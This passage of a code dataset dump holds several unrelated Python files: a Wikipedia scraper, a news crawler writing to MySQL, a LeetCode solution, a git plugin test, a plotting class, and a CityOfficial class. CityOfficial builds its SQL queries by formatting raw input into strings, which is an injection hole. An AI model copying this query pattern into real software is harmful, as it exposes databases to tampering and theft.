        bYear=dateText[-4:]\n        if(not bYear.isdigit()):\n            return \"error\"\n        bMonth=\"01\"\n        bDay=\"01\"\n    if(len(bMonth)<2):\n        bMonth=\"0\"+bMonth\n    if(len(bDay)<2):\n        bDay=\"0\"+bDay\n    dateString=bYear+\"-\"+bMonth+\"-\"+bDay\n    return dateString\n\ndef scraperFunc(category=\"19th-century_Mexican_politicians\"):\n    #------------------\n    #START OF MAIN CODE\n    #------------------\n    myUrl = \"https://en.wikipedia.org/w/api.php\"\n    #parameters={\"action\":\"query\",\"list\":\"allpages\",\"apfrom\":\"Mexic\",\"aplimit\":100,\"format\":\"json\"}\n    #params2={\"action\":\"query\",\"prop\":\"info\",\"inprop\":\"watchers\"}#what pages to do on\n    #pageName=\"Otto_von_Bismarck\"\n    #pageName=\"Stephen_F._Austin\"\n    #params3={\"action\":\"parse\",\"page\":pageName,\"format\":\"json\"}\n\n    #category=\"Critics_of_postmodernism\" #TEST: please remove!\n    VIEWDAYS=5\n    params4={\"action\":\"query\",\"generator\":\"categorymembers\",\"gcmtitle\":(\"Category:\"+category),\"gcmlimit\":200,\"gcmtype\":\"page\",\"prop\":\"revisions|pageviews|description|info\",\"rvslots\":\"main\",\"rvprop\":\"content\",\"pvipdays\":VIEWDAYS,\"inprop\":\"url\",\"format\":\"json\"}#idk rvslots\n    \n    myData = requests.get(myUrl, params=params4)\n    DATA = myData.json()\n    #print(type(DATA)) #should be dictionary\n\n    #PAGES = DATA[\"query\"][\"allpages\"] #error if not exists\n\n    '''\n    #params3\n    pageText = DATA[\"parse\"][\"text\"][\"*\"]\n\n    #actually parsing the stuff\n    dateStart = pageText.index(\"1):#date is for singular events, only check if not birth/death since generic name\n                dateString=parseDate(pageText,dateTypes[i])\n            else:\n                del myJSON[pageTitle]\n                continue\n            if(dateString!=\"error\"):\n                myJSON[pageTitle].append(dateString)\n            else:#idk what to do here\n                print(\"Error in parsing\",pageTitle)\n                badDate+=1\n                del myJSON[pageTitle]\n                continue\n            myJSON[pageTitle].append(\"3000-01-01\")\n        try:\n            myJSON[pageTitle].append(myPage[\"description\"])\n        except:\n            #print(\"No short description\")\n            myJSON[pageTitle].append(myPage[\"title\"])#just has title as description\n        try:\n            viewAvg=0\n            for viewday in myPage[\"pageviews\"]:\n                if(myPage[\"pageviews\"][viewday]==None):\n                    continue\n                viewAvg+=myPage[\"pageviews\"][viewday]\n            viewAvg/=VIEWDAYS\n            myJSON[pageTitle].append(viewAvg)\n        except:\n            #print(\"No pageview data\")\n            myJSON[pageTitle].append(5)\n        myJSON[pageTitle].append(myPage[\"fullurl\"])\n\n    myJSON=sorted(myJSON.items(), key=lambda x:x[1][0])#python 3.6+ required\n    return myJSON\n\n#with open(\"dateJSON.json\",\"w\") as myFile:\n#    json.dump(myJSON,myFile)\n","sub_path":"Scraper.py","file_name":"Scraper.py","file_ext":"py","file_size_in_byte":5917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}\n{"seq_id":"536764548","text":"# -*- coding: utf-8 -*-\n'''\nCreated on 2015-06-12\n\nExtract news from the channel home page or from each company's news channel\n@author: liqing\n'''\n\nimport time,traceback,os\nimport hashlib\nfrom newspaper import Article\nfrom crawl.basecrawl import BaseCrawl,BaseExtract\nfrom config.logsetting import logger\nfrom config.dbcon import get_cxn_db\nfrom boilerpipe.extract import Extractor\nfrom pybloom import BloomFilter\n\nIDEL_TIME = 2\nMAX_TRY_TIMES = 3\nFINANCE_HOME = 'finance_home'\nNEWS_URL_EXTRACTE = 0\n\n\ndef get_compnewsurls(code_names_file,url_prefix,finance_homes=None):\n    '''Generate the urls of the listed companies' news channels\n    @param code_names_file: file listing the companies' stock codes\n    @param url_prefix: prefix used to build a listed company's news url\n    @param finance_homes: addresses of the finance channel home pages\n    '''\n    if code_names_file is None or url_prefix is None:\n        logger.error('
code_names_file or url_prefix is None')\n        return []\n    news_chanel_urls = []\n    if finance_homes and len(finance_homes) > 0:\n        for f_home in finance_homes:\n            news_chanel_urls.append((FINANCE_HOME,f_home))\n    try:\n        path = os.path.realpath(__file__)\n        path = os.path.dirname(path)\n        lspath = os.path.split(path)\n        if lspath[0] and lspath[1]:\n            code_names_file = lspath[0] + '/data/' + code_names_file\n        \n        \n        for code_name in open(code_names_file):\n            if code_name and len(code_name) > 0:\n                cols = code_name.split('\\t')\n                if cols and len(cols) > 1:\n                    news_chanel_urls.append((cols[0],url_prefix + cols[0]))\n    except:\n        logger.error(\"crawl_page failed ,Error:%s\" % traceback.format_exc()) \n    return news_chanel_urls\n\n\n# build a Bloom filter\nbf = BloomFilter(capacity=1500000, error_rate=0.001)\ndef initUrlsBloomFilter(cursor,source_type):\n    '''Build a Bloom filter of the news urls that have already been crawled\n    @param cursor: db connection\n    @param source_type: crawl source, e.g. yahoo, google, etc.\n    '''\n    sql = \"select url from news_extract_content where crawl_source = \" + str(source_type) + \" limit %s,%s\"\n    w_flag = True\n    index = 0\n    page_num = 50000\n    while w_flag:\n        w_flag = False\n        count = cursor.execute(sql,(index,page_num))\n        if count > 0:\n            w_flag = True\n            data = cursor.fetchall()\n            for da in data :\n                url = da[0]\n                bf.add(url)\n        index += page_num\n        \n    \n\nclass ExtracteNewsurls(object):\n    \"\"\"\n    Extracts the news links from each source's channel pages; the extraction is mostly layout-specific, so it may differ per source\n    \"\"\"\n    def extracte(self,news_chanel_url,is_finance_home,baseCrawl,baseExtract,req_referer,try_times = 1):\n        '''Extract all urls from the channel home page or from a company's news channel;\n        each page is crawled at most MAX_TRY_TIMES+1 times\n        @param news_chanel_url: the url to crawl\n        @param is_finance_home: whether this is a finance_home page, which may need special handling\n        @param baseCrawl: the wrapped crawler base class\n        @param baseExtract: the wrapped extractor base class\n        @param try_times: retry count\n        @return: crawl status, extracted news links\n        '''\n        \n        logger.info(\"crawl %s, %d time\"%(news_chanel_url,try_times))\n        time.sleep(IDEL_TIME * (try_times-1))\n        status = 2\n        html = ''\n        try:\n            status,html = baseCrawl.crawl_page(news_chanel_url, req_referer = req_referer)\n            # all news links found under this channel\n            news_links = []\n            if status == 200:\n                status = 0\n                logger.info(\"crawl %s, success \"%news_chanel_url)\n                news_links = self.extracteUrls(baseExtract,html, is_finance_home)\n                \n            elif status in [301,302]:\n                status = 1\n                logger.info(\"crawl %s, no data,fail\"%news_chanel_url)\n            else:\n                if try_times <= MAX_TRY_TIMES:\n                    return self.extracte(news_chanel_url,is_finance_home, baseCrawl, baseExtract, req_referer, try_times+1)\n                else:\n                    status = 2\n                    logger.error(\"crawl %s, %d time,fail\"%(news_chanel_url,try_times))\n        except:\n            logger.error(\"crawl %s, failed ,Error:%s\" % (news_chanel_url,traceback.format_exc()))\n        \n        \n        return status,news_links\n    \n    \n    \n    \n    \n    def extracteUrls(self,baseExtract,html,is_finance_home):\n        \"\"\"Extract the news links\n        @param baseExtract: the wrapped extractor base class\n        @param html: page content\n        @param is_finance_home: whether this is a finance_home page, which may need special handling\n        \"\"\"\n        # must be implemented by subclasses\n        raise NotImplementedError\n\n\n\ndef extract_news(code,news_links,crawl_source,cursor):\n    '''Extract the news articles and run NLP on them\n    @param code: listed company code\n    @param news_links: news links to extract\n    @param crawl_source\n    @param cursor: database cursor\n    '''\n
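    # assumption: url_md5 is the table's unique key, so the ON DUPLICATE KEY UPDATE below refreshes an existing row (and bumps extract_count) instead of inserting a duplicate\n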
    \n    in_sql = \"\"\" INSERT INTO news_extract_content(url_md5,url,code_name,newspaper_title,newspaper_text,\nnewspaper_authors,newspaper_summary,newspaper_keywords,boilerpipe_article,\nboilerpipe_articlesentences,boilerpipe_keepeverything,boilerpipe_largestcontent,\nboilerpipe_numwordsrules,boilerpipe_canola,up_time,add_time,extract_count,crawl_source)\nVALUES\n(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,now(),now(),1,%s)\non duplicate key update code_name = %s,newspaper_title = %s,newspaper_text = %s,\nnewspaper_authors = %s,newspaper_summary = %s,newspaper_keywords = %s,\nboilerpipe_article = %s,boilerpipe_articlesentences = %s,boilerpipe_keepeverything = %s,\nboilerpipe_largestcontent = %s,boilerpipe_numwordsrules = %s,boilerpipe_canola = %s,\nup_time = now(),extract_count=extract_count+1,crawl_source = %s \"\"\"\n    \n    for link in news_links:\n        # urls shorter than 30 characters are usually not news links; crude, but simple and dependable\n        if link is None or len(link) <= 30:\n            continue\n        # urls that have already been crawled do not need to be crawled again\n        if link in bf:\n            continue\n        \n        try:\n            global NEWS_URL_EXTRACTE\n            NEWS_URL_EXTRACTE += 1\n            url_md5 = hashlib.md5(link).hexdigest()\n            # first, use newspaper\n            newspaper_title = ''\n            newspaper_text = ''\n            newspaper_authors = ''\n            newspaper_summary = ''\n            newspaper_keywords = ''\n            article = Article(link)\n            article.download()\n            html = article.html\n            if html is None or len(html) == 0:\n                continue\n            article.parse()\n            if article.text and len(article.text) > 0:\n                newspaper_title = article.title\n                newspaper_text = article.text\n                newspaper_authors = article.authors\n                if newspaper_authors and len(newspaper_authors) > 0:\n                    newspaper_authors = ','.join(newspaper_authors)\n                else:\n                    newspaper_authors = ''\n                \n                \n                article.nlp()\n                newspaper_summary = article.summary\n                newspaper_keywords = article.keywords\n                if newspaper_keywords and len(newspaper_keywords) > 0:\n                    newspaper_keywords = ','.join(newspaper_keywords)\n                else:\n                    newspaper_keywords = ''\n            \n            # then, use boilerpipe\n            \n            extractor = Extractor(extractor='ArticleExtractor',html = html)\n            boilerpipe_article = extractor.getText()\n            \n            extractor = Extractor(extractor='ArticleSentencesExtractor',html = html)\n            boilerpipe_articlesentences = extractor.getText()\n            \n            extractor = Extractor(extractor='KeepEverythingExtractor',html = html)\n            boilerpipe_keepeverything = extractor.getText()\n            \n            extractor = Extractor(extractor='LargestContentExtractor',html = html)\n            boilerpipe_largestcontent = extractor.getText()\n            \n            extractor = Extractor(extractor='NumWordsRulesExtractor',html = html)\n            boilerpipe_numwordsrules = extractor.getText()\n            \n            extractor = Extractor(extractor='CanolaExtractor',html = html)\n            boilerpipe_canola = extractor.getText()\n            \n            # query parameters\n            content = (url_md5,link,code, newspaper_title, newspaper_text, newspaper_authors,newspaper_summary,newspaper_keywords,\\\n                       boilerpipe_article,boilerpipe_articlesentences,boilerpipe_keepeverything,boilerpipe_largestcontent,\\\n                       boilerpipe_numwordsrules,boilerpipe_canola,crawl_source, \\\n                       code, newspaper_title,newspaper_text, newspaper_authors,\\\n                       newspaper_summary,newspaper_keywords,boilerpipe_article,boilerpipe_articlesentences,boilerpipe_keepeverything,\\\n                       boilerpipe_largestcontent,boilerpipe_numwordsrules,boilerpipe_canola,crawl_source)\n            cursor.execute(in_sql,content)\n            \n        except:\n            logger.error(\"crawl_page failed ,Error:%s\" % traceback.format_exc())\n    \n    \n\ndef go_newsextrac(source_type,code_names_file,url_prefix,req_referer,finance_homes,extracteNewsurls):\n    '''Crawl all the news links, extract them and store the results\n    @param source_type: crawl source, e.g. yahoo, google, etc.\n    @param code_names_file: file listing the companies' stock codes\n    @param url_prefix: prefix used to build a listed company's news url\n    @param req_referer: referer sent with requests, to avoid being blocked\n    @param finance_homes: addresses of the finance channel home pages\n    @param extracteNewsurls: source-specific extraction object\n    '''\n    baseCrawl = BaseCrawl() \n    baseExtract = BaseExtract()\n    \n    cxn_db = None\n    try:\n        cxn_db = get_cxn_db()\n        cur_db = cxn_db.cursor()\n        # build a bloom filter\n        initUrlsBloomFilter(cur_db,source_type)\n        \n        in_sql = \"\"\" insert into com_news_extract_state (url,code_name,crawl_time,return_type,add_time,crawl_count,source_type)\nvalues (%s,%s,now(),%s,now(),1,%s)\non duplicate key 
update crawl_time = now(),return_type = %s,crawl_count=crawl_count+1,source_type = %s \"\"\"\n        \n        news_chanel_urls = get_compnewsurls(code_names_file,url_prefix,finance_homes)\n        \n        logger.info(\"number of companies is %d\"%len(news_chanel_urls))\n        for code,news_chanel_url in news_chanel_urls:\n            logger.debug(\"crawl %s, start............ \"%news_chanel_url)\n            is_finance_home = False\n            if code == FINANCE_HOME:\n                is_finance_home = True\n            status,news_links = extracteNewsurls.extracte(news_chanel_url,is_finance_home,baseCrawl,baseExtract,req_referer,try_times = 1)\n            cur_db.execute(in_sql,(news_chanel_url,code,status,source_type,status,source_type))\n            if status == 0 and len(news_links) > 0:\n                extract_news(code,news_links,source_type,cur_db)\n            logger.debug(\"crawl %s, end.............. \"%code)\n        \n        logger.info(\"number of news url is %s\"%NEWS_URL_EXTRACTE)\n        \n    except:\n        logger.error(\"crawl_page failed ,Error:%s\" % traceback.format_exc()) \n    finally:\n        if cxn_db:\n            cxn_db.close()\n    \nif __name__ == '__main__':\n    cxn_db = None\n    try:\n        cxn_db = get_cxn_db()\n        cur_db = cxn_db.cursor()\n        # build a bloom filter\n        initUrlsBloomFilter(cur_db,1)\n        \n#        print bf.exists('https://mail.yahoo.com/?.intl=us&.lang=en-US&.src=ym')\n#        print bf.exists('http://www.latimes.com/la-fi-hy-helmet-safety-20150409-story.html')\n#        print bf.exists('http://www.baidu.com')\n        \n    except:\n        logger.error(\"crawl_page failed ,Error:%s\" % traceback.format_exc()) \n    finally:\n        if cxn_db:\n            cxn_db.close()\n\n","sub_path":"crawl/newsextracte.py","file_name":"newsextracte.py","file_ext":"py","file_size_in_byte":11925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}\n{"seq_id":"440513182","text":"#\r\n# @lc app=leetcode.cn id=236 lang=python\r\n#\r\n# [236] Lowest Common Ancestor of a Binary Tree\r\n#\r\n\r\n# @lc code=start\r\n# Definition for a binary tree node.\r\n# class TreeNode(object):\r\n#     def __init__(self, x):\r\n#         self.val = x\r\n#         self.left = None\r\n#         self.right = None\r\n\r\nclass Solution(object):\r\n\r\n    def lowestCommonAncestor(self,root,p,q):\r\n        \"\"\"\r\n        :type root: TreeNode\r\n        :type p: TreeNode\r\n        :type q: TreeNode\r\n        :rtype: TreeNode\r\n        \"\"\"\r\n        if not root or root == p or root == q:\r\n            return root\r\n        else:\r\n            left = self.lowestCommonAncestor(root.left, p, q)\r\n            right = self.lowestCommonAncestor(root.right, p, q)\r\n            \r\n            if left and right: # one target is in the left subtree, the other in the right\r\n                return root\r\n            elif left: # both are in the left subtree\r\n                return left\r\n            elif right: # both are in the right subtree\r\n                return right\r\n            else:\r\n                return\r\n\r\n# @lc code=end\r\n\r\n","sub_path":"Week_03/236.二叉树的最近公共祖先.py","file_name":"236.二叉树的最近公共祖先.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}\n{"seq_id":"395267275","text":"# from connection import *\nfrom datetime import datetime\nfrom connection import *\n\nclass CityOfficial():\n\n\tdef applyFilter(self, name, city, state, zipCode, flag, dateFlag):\n\t\tconnection = connect()\n\t\tcursor = connection.cursor()\n\n\t\tisFirstCondition = True\n\n\t\tif name == None and city == None and state == None and zipCode == None and flag == None and dateFlag == [None, None]:\n\t\t\tsql = \"SELECT * FROM POI\"\n\t\telse:\n\t\t\tsql = \"SELECT * FROM POI WHERE\"\n\n\t\tif name == None:\n\t\t\tsql = sql\n\t\telse:\n\t\t\tsql = sql + \" LocationName = \\'{0}\\'\".format(name)\n\t\t\tisFirstCondition = False\n\n
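\t\t# note: building SQL with str.format on user-supplied values is open to SQL injection; the parameterized form commented out further down (cursor.execute(sql, (...))) is the safer pattern\n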
\t\tif city == None:\n\t\t\tsql = sql\n\t\telse:\n\t\t\tif isFirstCondition:\n\t\t\t\tsql = sql + \" City = \\'{0}\\'\".format(city)\n\t\t\t\tisFirstCondition = False\n\t\t\telse:\n\t\t\t\tsql = sql + \" AND City = \\'{0}\\'\".format(city)\n\n\t\tif state == None:\n\t\t\tsql = sql\n\t\telse:\n\t\t\tif isFirstCondition:\n\t\t\t\tsql = sql + \" State = \\'{0}\\'\".format(state)\n\t\t\t\tisFirstCondition = False\n\t\t\telse:\n\t\t\t\tsql = sql + \" AND State = \\'{0}\\'\".format(state)\n\n\t\tif zipCode == None:\n\t\t\tsql = sql\n\t\telse:\n\t\t\tif isFirstCondition:\n\t\t\t\tsql = sql + \" ZipCode = \\'{0}\\'\".format(zipCode)\n\t\t\t\tisFirstCondition = False\n\t\t\telse:\n\t\t\t\tsql = sql + \" AND ZipCode = \\'{0}\\'\".format(zipCode)\n\n\t\tif flag == None:\n\t\t\tsql = sql\n\t\telse:\n\t\t\tif isFirstCondition:\n\t\t\t\tsql = sql + \" Flag = {0}\".format(flag)\n\t\t\t\tisFirstCondition = False\n\t\t\telse:\n\t\t\t\tsql = sql + \" AND Flag = {0}\".format(flag)\n\n\n\t\tFormalized_Date = [\"DateFlagged\", \"DateFlagged\"]\n\n\t\tif dateFlag == [None, None]:\n\t\t\tsql = sql\n\t\telse:\n\t\t\t# Assume time format: Date: yyyy/mm/dd ; Time: hh:mm, both as strings\n\t\t\tfor i in range(len(dateFlag)):\n\t\t\t\tif dateFlag[i] is not None:\n\t\t\t\t\tDate = dateFlag[i].split('/')\n\t\t\t\t\tDate = map(int, Date)\n\t\t\t\t\t# Convert the format into yyyy-mm-dd hh:mm\n\t\t\t\t\tFormalized_Date[i] = (datetime(*Date).strftime('%Y-%m-%d'))\n\t\t\t\t\tFormalized_Date[i] = \"\\'%s\\'\" % Formalized_Date[i]\n\n\t\t\tif isFirstCondition:\n\t\t\t\t# if not (None in dateFlag):\n\t\t\t\tsql = sql + \" DateFlagged >= {0} AND DateFlagged <= {1}\".format(Formalized_Date[0], Formalized_Date[1])\n\t\t\t\tisFirstCondition = False\n\t\t\telse:\n\t\t\t\tsql = sql + \" AND DateFlagged >= {0} AND DateFlagged <= {1}\".format(Formalized_Date[0], Formalized_Date[1])\n\n\t\t# if isFirstCondition:\n\t\t# \tsql = sql + \" LocationName in (SELECT DISTINCT LocName FROM Data_Point WHERE Status = 'Accepted')\"\n\t\t# \tisFirstCondition = False\n\t\t# else:\n\t\t# \tsql = sql + \" AND LocationName in (SELECT DISTINCT LocName FROM Data_Point WHERE Status = 'Accepted')\"\n\t\t#print (sql)\n\n\t\t# sql = \"SELECT * FROM POI WHERE LocationName = %s AND City = %s AND State = %s AND ZipCode = %s AND Flag = %s AND DateFlagged BETWEEN %s AND %s\"\n\t\t# sql = \"SELECT * FROM POI WHERE LocationName = \\'Lenox Square\\'\"\n\n\t\tcursor.execute(sql)\n\t\t# # cursor.execute(sql, (name, city, state, zipCode, flag, Formalized_Date[0], Formalized_Date[1]))\n\t\tresults = cursor.fetchall()\n\t\t# return results\n\t\tconnection.close()\n\n\t\tfor result in results:\n\t\t\tresult['DateFlagged'] = str(result['DateFlagged'])\n\t\t# print results\n\t\t# print results[0].keys()\n\n\t\t# Change the name of keys to make it compatible with jsonify() in serv.py\n\t\tif results is not None:\n\t\t\tfor dic in results:\n\t\t\t\tdic['id'] = results.index(dic)\n\t\t\t\tdic['name'] = dic.pop(u'LocationName')\n\t\t\t\tdic['zip'] = dic.pop(u'ZipCode')\n\t\t\t\tdic['city'] = dic.pop(u'City')\n\t\t\t\tdic['state'] = dic.pop(u'State')\n\t\t\t\tdic['flag'] = dic.pop(u'DateFlagged')\n\t\t\t\tdic['flagged'] = dic.pop(u'Flag')\n\n\t\t# print results\n\t\treturn results\n\n\n\tdef showPOIDetail(self, locname, dataType, dataValue, date, time):\n\t\t# Requires two datetime values as input\n\t\tconnection = connect()\n\t\tcursor = connection.cursor()\n\n\t\tsql = \"SELECT DataType, DataValue, DateTime FROM Data_Point WHERE LocName = \\'{0}\\'\".format(locname)\n\n\t\tif dataType == None:\n\t\t\tsql = sql\n\t\telse:\n\t\t\tsql = sql + \" AND DataType = 
\\'{0}\\'\".format(dataType)\n\n\t\tif dataValue == [None, None]:\n\t\t\tsql = sql\n\t\telse:\n\t\t\tif dataValue[0] == None:\n\t\t\t\tdataValue[0] = 0\n\t\t\tif dataValue[1] == None:\n\t\t\t\tdataValue[1] = 99999999\n\t\t\t# Default_DataValue = ['DataValue', 'DataValue']\n\t\t\t# for i in range(len(dataValue)):\n\t\t\t\t# if dataValue[i] is not None:\n\t\t\t\t# \tDefault_DataValue[i] = \"\\'%s\\'\" % dataValue[i]\n\t\t\t\t# \tprint Default_DataValue[i]\n\n\t\t\tsql = sql + \" AND DataValue >= {0} AND DataValue <= {1}\".format(dataValue[0], dataValue[1])\n\n\t\tif date == None:\n\t\t\tsql = sql\n\t\telse:\n\t\t\tFormalized_DateTime = [\"DateTime\", \"DateTime\"]\n\t\t\tfor i in range(len(date)):\n\t\t\t\tif date[i] is not None:\n\t\t\t\t\tDateTime = date[i].split('/') + time[i].split(':')\n\t\t\t\t\tDateTime = map(int, DateTime)\n\t\t\t\t\t# Convert the format into yyyy-mm-dd hh:mm\n\t\t\t\t\tFormalized_DateTime[i] = (datetime(*DateTime).strftime('%Y-%m-%d %H:%M'))\n\t\t\t\t\tFormalized_DateTime[i] = \"\\'%s\\'\" % Formalized_DateTime[i]\n\n\t\t\tsql = sql + \" AND DateTime >= {0} AND DateTime <= {1}\".format(Formalized_DateTime[0], Formalized_DateTime[1])\n\n\t\tsql = sql + \" AND Status = 'Accepted' ORDER BY DateTime\"\n\n\t\t# print sql\n\t\tcursor.execute(sql)\n\t\tresults = cursor.fetchall()\n\t\t# print results\n\t\tconnection.close()\n\n\t\tif results is not None:\n\t\t\tfor dic in results:\n\t\t\t\t# dic['id'] = results.index(dic)\n\t\t\t\tdic['attr'] = dic.pop(u'DataType')\n\t\t\t\tdic['val'] = dic.pop(u'DataValue')\n\t\t\t\tdic['ts'] = dic.pop(u'DateTime')\n\t\t\t\tdic['loc'] = locname\n\n\t\t# print results\n\t\treturn results\n\n\n\tdef flagPOI(self, locname, status):\n\t\tconnection = connect()\n\t\tcursor = connection.cursor()\n\n\t\t# get current time\n\t\tdateFlagged = \"{0}\".format(datetime.now())\n\t\tdateFlagged = dateFlagged.split(' ')\n\n\t\tdateFlagged = dateFlagged[0] if status else 'NULL'\n\n\t\tif status:\n\t\t\tsql = \"UPDATE POI SET Flag = \\'{0}\\', DateFlagged = \\'{1}\\' WHERE LocationName = \\'{2}\\'\".format(status, dateFlagged, locname)\n\t\telse:\n\t\t\tsql = \"UPDATE POI SET Flag = \\'{0}\\', DateFlagged = NULL WHERE LocationName = \\'{1}\\'\".format(status, locname)\n\t\t# sql = \"UPDATE POI SET DateFlagged = \\'{0}\\' WHERE LocationName = \\'{1}\\'\".format(dateFlagged, locname)\n\n\t\tcursor.execute(sql)\n\n\t\tconnection.commit()\n\t\tconnection.close()\n\n\t\tif dateFlagged != 'NULL':\n\t\t\treturn dateFlagged\n\t\telse:\n\t\t\treturn None\n","sub_path":"City_Official.py","file_name":"City_Official.py","file_ext":"py","file_size_in_byte":6043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"101371206","text":"import importlib.machinery\nfrom os.path import abspath, join, dirname\n\nimport peru\nimport shared\n\ngit_plugin_path = abspath(\n join(\n dirname(peru.__file__), 'resources', 'plugins', 'git',\n 'git_plugin.py'))\nloader = importlib.machinery.SourceFileLoader(\"git_plugin\", git_plugin_path)\ngit_plugin = loader.load_module()\n\n\n# NOTE: The sync/reup functionality for the git plugin is tested in\n# test_plugins.py along with the other plugin types.\nclass GitPluginTest(shared.PeruTest):\n def test_expand_relative_submodule_url(self):\n cases = [\n (\"http://foo.com/a/b\", \"c\", \"c\"),\n (\"http://foo.com/a/b\", \"./c\", \"http://foo.com/a/b/./c\"),\n (\"http://foo.com/a/b\", \"../c\", \"http://foo.com/a/b/../c\"),\n (\"http://foo.com/a/b\", \"../../c\", 
\"http://foo.com/a/b/../../c\"),\n (\"http://foo.com/a/b\", \".//../c\", \"http://foo.com/a/b/.//../c\"),\n ]\n for (parent, submodule, expected) in cases:\n result = git_plugin.expand_relative_submodule_url(\n submodule, parent)\n assert expected == result, \"{} != {}\".format(expected, result)\n","sub_path":"tests/test_git_plugin.py","file_name":"test_git_plugin.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"354685522","text":"import pickle\r\nimport sys\r\nsys.path.append('../')\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom thetaOscillationsUnitsRecorded import KwargsVariablesDict\r\n\r\n#debug('Dict: ',KwargsVariablesDict)\r\n\r\n#Default dictionary\r\nDefaultDict = KwargsVariablesDict\r\n\r\n#\r\n#Define class\r\n#\r\n\r\nclass statsClass(object):\r\n\r\n\tdef __init__(self,**_NewKwargsVariablesDict):\r\n\r\n\t\t#init with parameters of simulation\r\n\t\tself.__dict__.update(DefaultDict)\r\n\r\n\t\t#init parameters\r\n\t\tself.__dict__.update(**_NewKwargsVariablesDict)\r\n\r\n\t\t# set Time \r\n\t\tself.bins_int = int(self.finalTimeFloat/self.stepTimeFloat) #no. of time steps\r\n\t\tself.t_span = np.linspace(0, self.finalTimeFloat, self.bins_int, endpoint=True)\r\n\r\n\t\t#load spiking data\r\n\t\tself.spikeTimesArraysArray = pickle.load(open(self.dataFile))\r\n\r\n\tdef neuronsRaster(self):\r\n\r\n\t\timport utils\r\n\r\n\t\tif hasattr(self, 'chosenNeuron')==False:\r\n\t\t\tself.chosenNeuron = self.recordNeuronIndexIntsList\r\n\r\n\t\tif len(self.chosenNeuron)>1:\r\n\t\t\tself.neuronColorStrsList=utils.getColorTuplesList(\r\n\t\t\t\t\"Red\",\r\n\t\t\t\t\"Blue\",\r\n\t\t\t\tlen(self.chosenNeuron)\r\n\t\t\t\t)\r\n\r\n\t\tfor _index, _neuronID in enumerate(self.chosenNeuron):\r\n\t\t\tself.neuronSpikeTimesArrays = self.spikeTimesArraysArray['Neuron '+str(_neuronID)]\r\n\r\n\t\t\t#plot raster for chosen neuron\r\n\t\t\tfor trialIndex in xrange(self.simulationsInt):\r\n\t\t\t\tSpikeTrain = self.neuronSpikeTimesArrays[trialIndex]\r\n\t\t\t\tplt.plot(\r\n\t np.array(SpikeTrain)*self.stepTimeFloat,\r\n\t [trialIndex+1]*len(SpikeTrain),\r\n\t '.',\r\n\t\t\t\t\tcolor=self.neuronColorStrsList[_index] if len(self.chosenNeuron)>1 else 'Blue'\r\n\t\t\t\t\t)\r\n\r\n\t\tplt.xlabel('Time/ ms', fontsize='large', fontweight='medium')\r\n\t\tplt.ylabel('Trial Number', fontsize='large', fontweight='medium')\r\n\r\n\t\tplt.show()\r\n\t\treturn self\r\n\r\n\r\n\tdef neuronFiringRate(self):\r\n\r\n\t\t#\r\n\t\t# choose neuron\r\n\t\t#\r\n\t\tif hasattr(self, 'chosenNeuron')==False:\r\n\t\t\tself.chosenNeuron = self.recordNeuronIndexIntsList\r\n\r\n\t\tfor neuronID in self.chosenNeuron:\r\n\t\t\tself.neuronSpikeTimesArrays = self.spikeTimesArraysArray['Neuron '+str(neuronID)]\r\n\r\n\t\t\t#plot raster for chosen neuron\r\n\t\t\tif len(self.chosenNeuron)==1:\r\n\t\t\t\tfor trialIndex in xrange(self.simulationsInt):\r\n\t\t\t\t\tSpikeTrain = self.neuronSpikeTimesArrays[trialIndex]\r\n\t\t\t\t\tplt.plot(\r\n\t\t np.array(SpikeTrain)*self.stepTimeFloat,\r\n\t\t [trialIndex+1]*len(SpikeTrain),\r\n\t\t 'b|'\r\n\t\t )\r\n\t\t \r\n\t\t\t#\r\n\t\t\t#generating a spike matrix across trials\r\n\t\t\t#\r\n\r\n\t\t\t#init\r\n\t\t\tself.spikeIntsArray = np.zeros((self.simulationsInt, self.bins_int))\r\n\r\n\t\t\tfor trialIndex in xrange(self.simulationsInt):\r\n\t\t\t\tif len(self.neuronSpikeTimesArrays[trialIndex]) == 0:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tself.spikeIntsArray[trialIndex, 
self.neuronSpikeTimesArrays[trialIndex]] = 1\r\n\r\n\t\t\tif hasattr(self, 'trialIndexIntsList')==False:\r\n\t\t\t\tself.trialIndexIntsList=xrange(0, self.simulationsInt)\r\n\t\t\tself.trialsInt=len(self.trialIndexIntsList) #number of trials\r\n\r\n\t\t\t#spike count and rate\r\n\t\t\tself.scNeuron = np.sum(self.spikeIntsArray[self.trialIndexIntsList,:], axis=0)\r\n\t\t\tself.rNeuron = self.scNeuron/self.trialsInt\r\n\r\n\t\t\tfor self.rateWindow in self.rateWindowFloatsList:\r\n\t\t\t\tself.rateBin=self.rateWindow/self.stepTimeFloat\r\n\t\t\t\tself.tBin=xrange(0, self.bins_int, int(self.rateBin))\r\n\r\n\t\t\t\t#compute rate over time windows\r\n\t\t\t\trateNeuron = map(\r\n\t\t\t\t\tlambda __Int:\r\n\t\t\t\t\tsum(self.rNeuron[__Int:__Int+self.rateBin])/(0.001*self.rateWindow),\r\n\t\t\t\t\tself.tBin\r\n\t\t\t\t\t)\r\n\r\n\t\t\t\tplt.plot((self.rateWindow/2.)+np.array(self.tBin)*self.stepTimeFloat, rateNeuron, \r\n\t\t\t\t\tlabel=r'r_${Neuron_'+str(self.chosenNeuron)+'}$', lw=2, alpha=1)\r\n\t\t\t\r\n\t\t\tplt.xlabel('Time/ ms', fontsize='large', fontweight='medium')\r\n\t\t\tplt.ylabel(r'Neuron Firing Rate (sp s$^{-1}$ )', fontsize='large', fontweight='medium')\r\n\r\n\t\t\tplt.hold(True)\r\n\t\tplt.show()\r\n\r\n\t\treturn self\r\n\r\n\r\n\tdef fanoFactor(self):\r\n\r\n\t\t#spike counts per time window\r\n\r\n\t\tself.spikeCountWindowFloatsList = map(\r\n\t\t\tlambda __Int:\r\n\t\t\tnp.sum(self.spikeIntsArray[self.trialIndexIntsList, 